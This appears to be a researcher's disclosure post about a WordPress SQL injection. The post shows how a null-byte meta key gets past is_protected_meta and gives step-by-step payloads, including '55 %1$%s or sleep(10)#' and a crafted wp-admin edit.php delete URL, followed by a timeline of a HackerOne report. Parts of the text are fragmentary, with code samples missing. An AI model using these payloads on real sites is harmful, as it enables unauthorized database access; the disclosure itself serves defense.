I found this vulnerability after reading slavco’s post, and reported it to Wordpress Team via Hackerone on Sep. 2nd, 2017. But, unfortunately, WordPress team didn’t pay attention to this report too.
- Wordpress SQLi by slavco
- Wordpress SQLi — PoC by slavco
- Wordpress SQLi — how to find by slavco
- Disclosure: WordPress WPDB SQL Injection - Technical by ircmaxell
If you already found out the potential sqli in wordpress, you would know that we need to insert our playload into
_thumbnail_id meta in order to launch the sqli attack.
This vulnerability have mentioned in slavco’s post: Wordpress SQLi
1). A normal query for _thumbnail_id
2). Change the meta_value of _thumbnail_id to “\x00_thumbnail_id”
3). Query by _thumbnail_id again
This is the
is_protected_meta(./wp-includes/meta.php) method used to check the validation of post meta:
The code just checks the first character of
$meta_key, from the mysql trick, we can use
%00_ to bypass it.
- Add New Custom Field, Name:
55 %1$%s or sleep(10)#
Add Custom Fieldbutton.
- Modify the HTTP request,
- Launch the attack. Visit
/wp-admin/edit.php?action=delete&_wpnonce=xxx&ids=55 %1$%s or sleep(10)#.
- Sep. 2th - I report the vulnerability to WP Team via Hackerone.
- Sep. 6th - WP Team ask for details.
- Sep. 6th - I post the details.
- Sep. 6th to now - I haven’t received any response yet…